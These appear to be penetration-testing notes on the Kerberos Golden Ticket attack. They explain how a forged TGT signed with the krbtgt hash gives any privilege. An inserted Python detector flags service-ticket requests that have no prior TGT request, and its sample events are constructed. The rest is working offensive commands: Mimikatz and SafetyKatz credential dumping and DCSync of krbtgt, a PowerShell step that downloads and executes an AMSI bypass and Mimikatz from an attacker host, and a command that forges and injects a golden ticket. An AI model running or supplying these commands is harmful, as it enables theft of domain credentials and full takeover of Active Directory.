A golden ticket is signed and encrypted with the hash of the krbtgt account, which makes it a valid TGT.
Since user account validation (PAC validation) is not done by the Domain Controller (KDC service) until the TGT is older than 20 minutes, we can use even deleted/revoked accounts.
The krbtgt account hash can be used to impersonate any user with any privileges, even from a non-domain machine.
A single password change has no effect on this attack because password history is maintained for the account (krbtgt remembers the last two passwords).
Microsoft recommends changing the krbtgt password twice within 6 months (there is a script for the purpose).
The attack starts at step 3 (TGS_REQ):
The TGT is encrypted using the RC4 hash or AES keys of the krbtgt account; the KDC decrypts it and issues the service ticket with the same group memberships and validation info found in the TGT.
So, if you have the krbtgt hash, you can forge your own TGT that includes PAC data with any group membership you want!
Another misconfiguration made by Microsoft is this one: the only validation the DC performs in this step is checking whether it can decrypt the TGT. Whatever is inside is treated as correct, and the DC must respond with a TGS.
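Because the attack enters the exchange at the TGS-REQ step, the KDC never issued the TGT: the DC logs a service ticket request (event 4769) for which it logged no TGT request (event 4768) from that user and host. The following detection logic is an added example and not part of the original notes; the event tuples are constructed sample data, the 10-hour window assumes the default "Maximum lifetime for user ticket" policy, and real deployments must aggregate 4768 events from every DC in the domain before applying it.

```python
"""Flag 4769 (TGS requested) events with no preceding 4768 (TGT requested)
for the same account and client address within the TGT lifetime."""
from datetime import datetime, timedelta

# Constructed sample events (not real logs): (timestamp, event_id, account, client_ip).
# 4769 logs the account as user@REALM; 4768 logs the bare account name.
SAMPLE_EVENTS = [
    ("2024-05-01T08:00:00", 4768, "alice", "10.0.0.5"),
    ("2024-05-01T08:00:02", 4769, "alice@CORP.LOCAL", "10.0.0.5"),
    ("2024-05-01T09:15:00", 4769, "Administrator@CORP.LOCAL", "10.0.0.99"),
    ("2024-05-01T09:15:05", 4769, "Administrator@CORP.LOCAL", "10.0.0.99"),
]

# Assumed default domain policy: TGTs are valid for at most 10 hours.
TGT_LIFETIME = timedelta(hours=10)


def normalize_account(name):
    """Strip the realm suffix and case so 4768 and 4769 names compare equal."""
    return name.split("@", 1)[0].lower()


def find_orphan_tgs(events, lifetime=TGT_LIFETIME):
    """Return (account, client_ip, timestamp) for every 4769 that is not
    preceded by a 4768 for the same account/client within `lifetime`."""
    parsed = sorted(
        (datetime.fromisoformat(ts), eid, normalize_account(acct), ip)
        for ts, eid, acct, ip in events
    )
    last_tgt = {}   # (account, client_ip) -> time the KDC last issued a TGT
    orphans = []
    for ts, eid, acct, ip in parsed:
        key = (acct, ip)
        if eid == 4768:
            last_tgt[key] = ts
        elif eid == 4769:
            issued = last_tgt.get(key)
            if issued is None or ts - issued > lifetime:
                # The KDC never saw an AS exchange for this TGT: it was
                # either forged offline or issued before our log window.
                orphans.append((acct, ip, ts.isoformat()))
    return orphans


if __name__ == "__main__":
    for hit in find_orphan_tgs(SAMPLE_EVENTS):
        print("TGS without prior TGT:", hit)
```

Hits at the start of the log window or from hosts whose AS exchange went to another DC are expected false positives, so treat the output as a triage lead rather than a verdict.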
We first need to get the krbtgt hash. So execute mimikatz on the DC as Domain Admin to get the krbtgt hash from the dump of NTDS.dit:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <domain-controller-FQDN>
Or we can use the DCSync technique, avoiding code execution on the DC:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt" "exit"'
.\SafetyKatz.exe "lsadump::dcsync /user:<domain>\krbtgt" "exit"
Or we can use the classic technique:
$Target="FQDN of domain controller"
$Sess=New-PSSession -ComputerName $Target
Invoke-Command -Session $Sess -ScriptBlock {
iex (New-Object System.Net.WebClient).DownloadString('http://ip.of.attacker.machine:port/amsibypass.txt');
iex (New-Object System.Net.WebClient).DownloadString('http://ip.of.attacker.machine:port/Invoke-Mimikatz.ps1');
}
With Mimikatz (this no longer works):
Invoke-Mimikatz -Command '"kerberos::golden /User:<user to impersonate> /domain:<domain> /sid:<domain sid> /krbtgt:<rc4 hash of krbtgt account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'